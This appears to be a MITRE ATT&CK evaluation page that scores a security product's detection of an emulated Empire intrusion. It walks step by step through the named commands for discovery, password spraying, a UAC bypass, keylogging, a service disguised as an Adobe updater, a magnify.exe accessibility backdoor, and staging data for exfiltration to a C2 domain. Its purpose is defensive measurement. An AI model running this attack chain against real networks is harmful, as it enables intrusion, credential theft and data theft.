Empire: C2 channel established using HTTPS traffic to freegoogleadsenseinfo.com
Standard Application Layer Protocol
(T1071)
None
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection to 192.168.0.5 (C2 server) over port 443 (no protocol was identified for this traffic). [1] [2] [3] [4] [5] [6]
Empire: Encrypted C2 channel established using HTTPS
Standard Cryptographic Protocol
(T1032)
None
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection to 192.168.0.5 (C2 server) over port 443 (no protocol was identified for this traffic). [1]
12.A.1
Empire: 'route print' via PowerShell
System Network Configuration Discovery
(T1016)
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because route print was part of the basic reconnaissance activity performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed powershell.exe executing route.exe with command-line arguments. The process tree view showed route.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
12.A.2
Empire: 'ipconfig -all' via PowerShell
System Network Configuration Discovery
(T1016)
Telemetry (Tainted)
Telemetry showed powershell.exe executing ipconfig.exe with command-line arguments. The process tree view showed ipconfig.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because ipconfig was part of the basic reconnaissance activity performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
12.B.1
Empire: 'whoami -all -fo list' via PowerShell
System Owner/User Discovery
(T1033)
Telemetry
Telemetry within the OverWatch alert showed powershell.exe executing whoami.exe with command-line arguments, and would be available in a separate view.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating whoami.exe with command-line arguments was suspicious. The process tree view showed whoami.exe as tainted by a previous powershell.exe detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6]
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because whoami was part of the basic reconnaissance activity performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6]
12.C.1
Empire: 'qprocess *' via PowerShell
Process Discovery
(T1057)
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because qprocess was part of the basic reconnaissance activity performed performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating qprocess.exe with command-line arguments was suspicious. The process tree view showed qprocess.exe as tainted by a previous powershell.exe detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5]
Telemetry
Telemetry within the OverWatch alert showed execution of qprocess.exe with command-line arguments, and would be available in a separate view.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5]
12.D.1
Empire: 'net start' via PowerShell
System Service Discovery
(T1007)
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe and net1.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net start was part of the basic reconnaissance activity performed performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
12.E.1
Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques
Scripting
(T1064)
Specific Behavior (Delayed)
The OverWatch team also sent an email indicating they identified a Specific Behavior for an unidentified PowerShell script running.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed the PowerShell script (.ps1) being written to the temp folder. [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior (Delayed)
The OverWatch team generated a Specific Behavior alert indicating the PowerShell script was malicious.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
12.E.1.1
Empire: WinEnum module included enumeration of user information
System Owner/User Discovery
(T1033)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
12.E.1.2
Empire: WinEnum module included enumeration of AD group memberships
Permission Groups Discovery
(T1069)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
12.E.1.3
Empire: WinEnum module included enumeration of password policy information
Password Policy Discovery
(T1201)
None
No detection capability demonstrated for this procedure.
12.E.1.4.1
Empire: WinEnum module included enumeration of recently opened files
File and Directory Discovery
(T1083)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
12.E.1.4.2
Empire: WinEnum module included enumeration of interesting files
File and Directory Discovery
(T1083)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
12.E.1.5
Empire: WinEnum module included enumeration of clipboard contents
Clipboard Data
(T1115)
None
No detection capability demonstrated for this procedure, though telemetry showed execution of an encoded PowerShell command and OverWatch alerted on it as suspicious. The PowerShell decoded to Windows.Clipboard(...) outside of the capability, which indicated clipboard interaction, but this was not counted as a detection because it was external to the capability. [1] [2] [3]
12.E.1.6.1
Empire: WinEnum module included enumeration of system information
System Information Discovery
(T1082)
Telemetry
Telemetry from decoded PowerShell (within the capability) showed the Get-Sysinfo function. [1] [2] [3] [4] [5] [6] [7] [8]
12.E.1.6.2
Empire: WinEnum module included enumeration of Windows update information
System Information Discovery
(T1082)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8]
12.E.1.7
Empire: WinEnum module included enumeration of system information via a Registry query
Query Registry
(T1012)
Telemetry
Telemetry from decoded PowerShell (within the capability) showed the Get-Sysinfo function. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
12.E.1.8
Empire: WinEnum module included enumeration of services
System Service Discovery
(T1007)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
12.E.1.9.1
Empire: WinEnum module included enumeration of available shares
Network Share Discovery
(T1135)
None
No detection capability demonstrated for this procedure.
12.E.1.9.2
Empire: WinEnum module included enumeration of mapped network drives
Network Share Discovery
(T1135)
None
No detection capability demonstrated for this procedure.
12.E.1.10.1
Empire: WinEnum module included enumeration of AV solutions
Security Software Discovery
(T1063)
None
No detection capability demonstrated for this procedure.
12.E.1.10.2
Empire: WinEnum module included enumeration of firewall rules
Security Software Discovery
(T1063)
None
No detection capability demonstrated for this procedure.
12.E.1.11
Empire: WinEnum module included enumeration of network adapters
System Network Configuration Discovery
(T1016)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
12.E.1.12
Empire: WinEnum module included enumeration of established network connections
System Network Connections Discovery
(T1049)
Telemetry (Tainted)
Telemetry showed powershell.exe executing netstat.exe with command-line arguments. The process tree view showed netstat.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7]
12.F.1
Empire: 'net group "Domain Admins" -domain' via PowerShell
Permission Groups Discovery
(T1069)
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment (Tainted)
The capability enriched net.exe with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net group was part of additional malicious discovery performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
12.F.2
Empire: 'net�localgroup�administrators' via PowerShell
Permission Groups Discovery
(T1069)
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net localgroup was part of additional malicious discovery performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
12.G.1
Empire: 'net user' via PowerShell
Account Discovery
(T1087)
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net user was part of additional malicious discovery performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
12.G.2
Empire: 'net user -domain' via PowerShell
Account Discovery
(T1087)
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net user was part of additional malicious discovery performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
13.A.1
Empire: 'net group "Domain Computers" -domain' via PowerShell
Remote System Discovery
(T1018)
Enrichment (Tainted)
The capability enriched net.exe with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). The process tree view showed the enrichment was tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net group was part of additional malicious discovery performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
13.B.1
Empire: 'net use' via PowerShell
System Network Connections Discovery
(T1049)
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net use was part of additional malicious discovery performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7]
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7]
13.B.2
Empire: 'netstat -ano' via PowerShell
System Network Connections Discovery
(T1049)
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because netstat was part of additional malicious discovery performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7]
Telemetry (Tainted)
Telemetry showed netstat.exe executing with command-line arguments. The process tree view showed netstat.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7]
13.C.1
Empire:�'reg query' via PowerShell to enumerate a specific Registry key
Query Registry
(T1012)
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because reg query was part of additional malicious discovery performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments. The process tree view showed reg.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert identifying reg.exe execution as suspicious. The alert was tainted by a parent powershell.exe detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
14.A.1
Empire: Built-in UAC bypass token duplication module executed to launch new callback with elevated process integrity level
Bypass User Account Control
(T1088)
Specific Behavior (Delayed)
The OverWatch team also sent an email indicating a Specific Behavior was observed because a base64 obfuscated PowerShell command was used to invoke UAC bypass.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
Telemetry
Telemetry showed an integrity level change through a query for powershell.exe processes of high integrity (12288/0x3000) that were created by medium integrity processes (8192/0x2000), which is indicative of bypassing UAC. Telemetry also showed the Invoke-BypassUACTokenManipulation function in the script. [1] [2] [3] [4]
Empire: UAC bypass module downloaded and wrote a new Empire stager (wdbypass) to disk
Remote File Copy
(T1105)
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because PowerShell retrieved the file wdbypass from www.freegoogleadsenseinfo.com (C2 domain) over port 8080.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Empire: UAC bypass module downloaded a new Empire stager (wdbypass) over HTTP
Standard Application Layer Protocol
(T1071)
None
No detection capability demonstrated for this procedure, though telemetry showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080. [1] [2] [3] [4] [5] [6]
Empire: UAC bypass module downloaded a new Empire stager (wdbypass) over port 8080
Commonly Used Port
(T1043)
Telemetry
Telemetry showed a network connection event to 192.168.0.5 (C2 server) on TCP port 8080 that was associated with the encoded PowerShell IEX command. [1] [2] [3] [4]
15.A.1
Empire: Built-in keylogging module executed to capture keystrokes of user Bob
Input Capture
(T1056)
Telemetry
Telemetry showed the decoded PowerShell script, which displayed the function Get-Keystrokes. [1] [2] [3] [4]
General Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was identified because they observed the adversary logging keystrokes based on the GetKeystrokes PowerShell function.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
Empire: Built-in keylogging module included residual enumeration of application windows
Application Window Discovery
(T1010)
Telemetry
Telemetry showed the decoded PowerShell script, which displayed the API call GetForegroundWindow to enumerate the active window. [1]
15.B.1
Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Credentials in Files
(T1081)
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because IT_tasks.txt was retrieved from a network share as a file of interest.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3]
Telemetry
Telemetry showed a file read event for IT_tasks.txt by powershell.exe as well as a FsPostOpen event indicating IT_tasks.txt was opened. [1] [2] [3]
16.A.1
Empire: 'net use' via PowerShell to brute force password spraying authentication attempts to Morris (10.0.1.4) and Nimda (10.0.1.6) targeting credentials of users�Kmitnick, Bob, and Frieda
Brute Force
(T1110)
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally using several accounts.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed, Tainted)
OverWatch generated General Behavior alerts indicating the net use commands were suspicious. The alerts were tainted by a parent powershell.exe detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed repeated logon attempts via net.exe with command-line arguments indicative of password spraying, including details that the logons were for local admin (type 6) and that they failed. [1] [2] [3] [4] [5] [6] [7] [8]
Empire: Brute force password spraying attempts targeted Windows admin shares on Morris (10.0.1.4) and Nimda (10.0.1.6)
Windows Admin Shares
(T1077)
Telemetry
Telemetry showed repeated logon attempts via net.exe with command-line arguments targeting ADMIN$ shares on the machines 10.0.1.4 (Morris) and 10.0.1.6 (Nimda). [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed, Tainted)
OverWatch generated General Behavior alerts indicating the net use commands attempting logon to ADMIN$ shares were suspicious. The alerts were tainted by a parent powershell.exe detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally to access resources on the network.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
16.B.1
Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick
Valid Accounts
(T1078)
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating the successful net use connection was suspicious. The alert was tainted by a parent powershell.exe detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to connect using the valid credentials of user Kmitnick (following multiple failed net use attempts). The telemetry was tainted by a parent powershell.exe detection. [1] [2] [3] [4]
Empire: Successful authentication targeted Windows admin share on Conficker (10.0.0.5)�
Windows Admin Shares
(T1077)
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally to access resources on the network.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to connect to ADMIN$ on 10.0.0.5 (Conficker) as the user Kmitnick (following multiple failed net use attempts). The telemetry was tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating the successful net use connection to ADMIN$ was suspicious. The alert was tainted by a parent powershell.exe detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
Empire: Successful authentication to Conficker (10.0.0.5) using credentials of user Kmitnick as a result of the brute force password spraying
Brute Force
(T1110)
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally using several accounts.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating the successful net use connection was suspicious. The alert was tainted by a parent powershell.exe detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments to connect as the user Kmitnick (following multiple failed net use attempts). The telemetry was tainted by a parent powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8]
16.C.1
Empire: 'net use -delete' via PowerShell
Network Share Connection Removal
(T1126)
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because the user Bob removed an artifact for the ADMIN$ share.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2]
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments. The telemetry was tainted by a previous powershell.exe detection. [1] [2]
16.D.1
Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)
Windows Admin Shares
(T1077)
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally to access resources on the network.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to the C$ share on 10.0.0.4 (Creeper) as the user Kmitnick. The telemetry was tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8]
Empire: 'net use' via PowerShell to successfully authenticate to Creeper (10.0.0.4) using credentials of user Kmitnick
Valid Accounts
(T1078)
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to the C$ share on Creeper as the user Kmitnick. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4]
16.E.1
Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)
Remote File Copy
(T1105)
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because a .vbs was written to the filesystem, which was likely used to carry out additional actions.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed File Write and New Script Write events for autoupdate.vbs under powershell.exe. The telemetry was tainted by a previous detection. [1] [2] [3] [4] [5] [6] [7] [8]
16.F.1
Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick�
Command-Line Interface
(T1059)
Telemetry (Tainted)
Telemetry showed a new cmd.exe process running wscript.exe as user Kmitnick, which then launched powershell.exe. The command line arguments for cmd.exe showed that autoupdate.vbs was run. The telemetry was tainted by a previous detection. [1] [2]
16.G.1
Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)
Remote File Copy
(T1105)
Telemetry
Telemetry showed update.vbs written to the C$ remote share on host 10.0.0.4 (Creeper). [1] [2] [3] [4] [5] [6] [7] [8]
16.H.1
Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Telemetry (Tainted)
Telemetry showed execution of sc.exe to query services on Creeper. The process tree view showed sc.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because the user Bob was querying for a particular service on Creeper.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
16.I.1
Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)
New Service
(T1050)
General Behavior (Delayed)
The OverWatch team sent an email indicating they observed a General Behavior because newly created file (AdobeUpdater service in registry) established persistence on the host.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3]
Telemetry (Tainted)
Telemetry showed sc.exe executing with command-line arguments for a new service called AdobeUpdater with binPath pointed to cmd.exe with arguments to execute update.vbs and service description "Synchronize with Adobe for security updates." The process tree view showed sc.exe as tainted by a previous powershell.exe detection. [1] [2] [3]
Empire: 'sc description' via PowerShell to remotely disguise a service on Creeper (10.0.0.4)
Masquerading
(T1036)
Telemetry (Tainted)
Telemetry showed sc.exe executing with command-line arguments for a new service called AdobeUpdater with binPath pointed to cmd.exe with arguments to execute update.vbs and service description "Synchronize with Adobe for security updates.". An analyst could use this information to determine it is not a legitimate service. The process tree view showed sc.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6]
16.J.1
Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Specific Behavior (Delayed)
The OverWatch team sent an email indicating they observed a Specific Behavior because the user Bob queried for a particular service on Creeper.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed sc.exe executing with command-line arguments to query the AdobeUpdater service on Creeper. The process tree view showed sc.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
16.K.1
Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)
File and Directory Discovery
(T1083)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
16.L.1
Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)
Service Execution
(T1035)
Specific Behavior (Delayed)
The OverWatch team sent an email indicating they observed a Specific Behavior because update.vbs executed following the start of the AdobeUpdater service.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2]
Telemetry (Tainted)
Telemetry showed sc.exe executing with command-line arguments to start the AdobeUpdater service on Creeper. The process tree view showed sc.exe as tainted by a previous powershell.exe detection. [1] [2]
17.A.1
Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services
System Service Discovery
(T1007)
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments to check if terminal services are enabled. The process tree view showed reg.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Empire: 'reg query' via PowerShell to enumerate a specific Registry key
Query Registry
(T1012)
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments. The process tree view showed reg.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
17.B.1
Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe
File and Directory Permissions Modification
(T1222)
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because takeown.exe was executed to bypass Windows logon.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed takeown.exe executing with command-line arguments. The process tree view showed takeown.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4]
17.B.2
Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe
File and Directory Permissions Modification
(T1222)
Telemetry (Tainted)
Telemetry showed execution of icacls.exe with command-line arguments. The process tree view showed icacls.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because icacls.exe was executed to bypass Windows logon.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
17.C.1
Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe
Accessibility Features
(T1015)
Telemetry (Tainted)
Telemetry showed a file write of magnify.exe by powershell.exe in the system directory. The telemetry was tainted by an alert on its parent powershell.exe process. [1] [2] [3] [4] [5]
18.A.1
Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
18.B.1
Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)
Data Staged
(T1074)
Telemetry
Telemetry showed the .vsdx file being written into the Recycle Bin. [1] [2]
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed the .vsdx file being copied to the Recycle Bin, a "likely location to stage files of interest."[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2]
Empire: 'copy' via PowerShell collected a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Data from Network Shared Drive
(T1039)
None
No detection capability demonstrated for this procedure, though telemetry was available for the write file of the .vsdx into the Recycle Bin (no data was available that indicated it came from a network shared drive).
19.A.1
Empire: File dropped to disk is a renamed copy of the WinRAR binary
Masquerading
(T1036)
Telemetry
Telemetry showed the SHA256 hash value of recycler.exe when it was written to disk, which an analyst could use to determine recycler.exe was actually WinRAR. [1] [2] [3] [4] [5] [6]
Empire: Built-in upload module executed to write binary (recycler.exe) to disk on CodeRed (10.0.1.5)
Remote File Copy
(T1105)
Telemetry (Tainted)
Telemetry showed file write of recycler.exe by powershell.exe as well as the network connection over which the download occurred. The process tree view showed the parent powershell.exe process as tainted by a previous wscript.exe detection. [1] [2] [3] [4] [5] [6] [7] [8]
19.B.1
Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file
Data Compressed
(T1002)
Telemetry
Telemetry within the alert showed the command-line details for the execution of recycler.exe, and would also be available in a separate view.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for a RAR archive "written by a process with suspicious command line arguments." The alert showed the command-line details and was tagged with the correct ATT&CK Technique (Data Compressed) and Tactic (Exfiltration). The process tree view showed the recycler.exe alert as tainted by a previous powershell.exe detection. [1] [2] [3]
Specific Behavior (Delayed)
The OverWatch team sent an email indicating they observed a Specific Behavior because a .vsdx file was archived for likely exfiltration using the renamed RAR binary, recycler.exe.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3]
Empire: Executed binary (recycler.exe) created encrypted archive (old.rar) of previously collected file
Data Encrypted
(T1022)
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because a .vsdx file was archived for likely exfiltration using the renamed WinRAR binary, recycler.exe.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2]
Specific Behavior (Tainted)
